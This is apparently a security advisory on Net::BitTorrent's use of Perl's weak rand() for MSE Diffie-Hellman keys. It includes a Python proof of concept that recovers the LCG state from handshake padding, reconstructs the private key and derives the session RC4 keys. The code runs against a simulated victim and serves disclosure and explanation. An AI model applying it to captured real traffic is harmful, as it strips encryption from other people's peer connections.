Impact
Net::BitTorrent generates its MSE (Message Stream Encryption) Diffie‑Hellman private key from Perl's rand(), a non‑cryptographic drand48‑style linear congruential generator with only 48 bits of internal state. Because the same generator also produces the cleartext padding sent in the handshake, a passive observer can recover the generator's state from the padding, run it backwards to reconstruct the private key, and combine that key with the peer's public value to compute the shared secret. The RC4 keys derived from that secret, and hence the whole encrypted stream, can then be decrypted: the confidentiality that MSE is meant to provide is lost entirely. The weakness is classified as CWE‑330 (Use of Insufficiently Random Values) and CWE‑338 (Use of Cryptographically Weak Pseudo‑Random Number Generator (PRNG)).
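The attack the paragraph describes, worked through as an added example (this is not Net::BitTorrent's code and not part of the advisory). The generator is a bit‑exact model of Perl's built‑in drand48‑style rand() (48‑bit LCG, multiplier 0x5DEECE66D, increment 0xB, output state/2^48). The victim's draw pattern is an assumption: 20 key bytes via int(rand(256)) followed by padding from the same generator; padding is modelled as four 32‑bit int(rand(2**32)) words so that a 2^16 brute force recovers the state. With 8‑bit padding bytes the same recovery needs a lattice step instead of the brute force shown here, but the rest of the attack (inverting the LCG to recover the key, then deriving the shared secret and RC4 keys) is unchanged. The 768‑bit prime is transcribed from the MSE spec and the recovery does not depend on it; the seed, the peer's private key and the SKEY value are constructed test inputs.

```python
"""State recovery against a drand48-style rand() used for MSE key material.
Added example; the victim's draw pattern is an assumption, not Net::BitTorrent's code."""
import hashlib

# Perl's rand(): 48-bit LCG, state' = (A*state + C) mod 2^48, output state'/2^48.
M = 1 << 48
A = 0x5DEECE66D
C = 0xB
A_INV = pow(A, -1, M)  # A is odd, so every LCG step is invertible mod 2^48

# 768-bit MSE prime and generator g = 2 (transcribed from the MSE spec; check
# against the spec before relying on it; the attack does not depend on it).
P = int("FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
        "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
        "4FE1356D6D51C245E485B576625E7EC6F44C42E9A63A36210000000000090563", 16)
G = 2


class PerlRand:
    """Bit-exact model of perl's drand48: step the state, return state/2^48 * n."""
    def __init__(self, seed):
        self.state = seed % M          # how it was seeded does not matter below

    def rand(self, n=1.0):
        self.state = (A * self.state + C) % M
        return self.state / M * n      # exact in a double: state < 2^48

    def randint(self, n):
        return int(self.rand(n))       # int(rand(256)) == state >> 40


def victim_handshake(rng, peer_pub):
    """Hypothetical MSE initiator (assumed draw pattern): 20 key bytes via
    int(rand(256)), then four int(rand(2**32)) padding words, same generator."""
    xa_bytes = bytes(rng.randint(256) for _ in range(20))
    xa = int.from_bytes(xa_bytes, "big")
    ya = pow(G, xa, P)                               # sent in the clear
    pad = [rng.randint(1 << 32) for _ in range(4)]   # sent in the clear
    secret = pow(peer_pub, xa, P)                    # what the observer is after
    return xa_bytes, ya, pad, secret


def recover_state(pad_words):
    """Observer: each 32-bit padding word is state >> 16, so only the low 16
    bits of the state behind the first word are unknown; the next words confirm."""
    top = pad_words[0] << 16
    for low in range(1 << 16):
        cand = top | low
        s = cand
        ok = True
        for w in pad_words[1:]:
            s = (A * s + C) % M
            if (s >> 16) != w:
                ok = False
                break
        if ok:
            return cand
    return None


def recover_private_key(state_at_first_pad, nbytes=20):
    """Run the LCG backwards: the nbytes states before the first padding word
    produced the key bytes, each as the top 8 bits of its state."""
    s = state_at_first_pad
    key = []
    for _ in range(nbytes):
        s = (A_INV * (s - C)) % M
        key.append(s >> 40)
    return bytes(reversed(key))


def mse_keys(secret, skey):
    """MSE key schedule: SHA1('keyA'|S|SKEY) and SHA1('keyB'|S|SKEY), S as 96
    big-endian bytes, SKEY = info hash (per the MSE spec)."""
    s = secret.to_bytes(96, "big")
    return (hashlib.sha1(b"keyA" + s + skey).digest(),
            hashlib.sha1(b"keyB" + s + skey).digest())


def run_attack(seed=0x2A7F19C3D8E1, peer_priv=0x1F2E3D4C5B6A79880706050403020100,
               skey=b"\x11" * 20):
    """Drive victim and observer with constructed inputs; report what was recovered."""
    rng = PerlRand(seed)
    peer_pub = pow(G, peer_priv, P)
    xa_bytes, ya, pad, secret = victim_handshake(rng, peer_pub)
    # The observer only ever sees ya, pad and peer_pub on the wire.
    state = recover_state(pad)
    if state is None:
        raise ValueError("no LCG state matches the observed padding")
    xa_rec = recover_private_key(state)
    xa_int = int.from_bytes(xa_rec, "big")
    secret_rec = pow(peer_pub, xa_int, P)
    return {
        "key_match": xa_rec == xa_bytes,
        "pub_match": pow(G, xa_int, P) == ya,
        "secret_match": secret_rec == secret,
        "rc4_keys": mse_keys(secret_rec, skey),
    }


if __name__ == "__main__":
    r = run_attack()
    print("private key recovered:", r["key_match"],
          "shared secret recovered:", r["secret_match"])
```

The point the example makes is that the attacker never needs the seed: any draw that exposes enough bits of one state pins the whole sequence, and because the step is invertible mod 2^48, material drawn before the exposed padding (the private key) is as recoverable as material drawn after it. A generator whose state cannot be reconstructed from its output (the OS CSPRNG, or a module such as Crypt::URandom in Perl) is the fix; hiding the padding would not be.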
Affected Systems
SankO's Net::BitTorrent library for Perl, all versions through 2.0.1, when it is used to encrypt peer connections with MSE. Every connection that one of these versions protects with MSE can be decrypted by anyone who observes its handshake; the installed version can be read from the module's $VERSION before deciding whether a deployment is affected.
Risk and Exploitability
The CVSS score of 5.9 indicates medium severity. EPSS data is not available and the vulnerability is not listed in CISA KEV. The attack requires only passive observation of the MSE handshake, with no active interception and no privileged access, and it directly compromises the confidentiality of all traffic on the affected connection. Because the attack is passive, a recorded handshake can be decrypted offline at any later time, so captures taken before an upgrade remain exposed.
OpenCVE Enrichment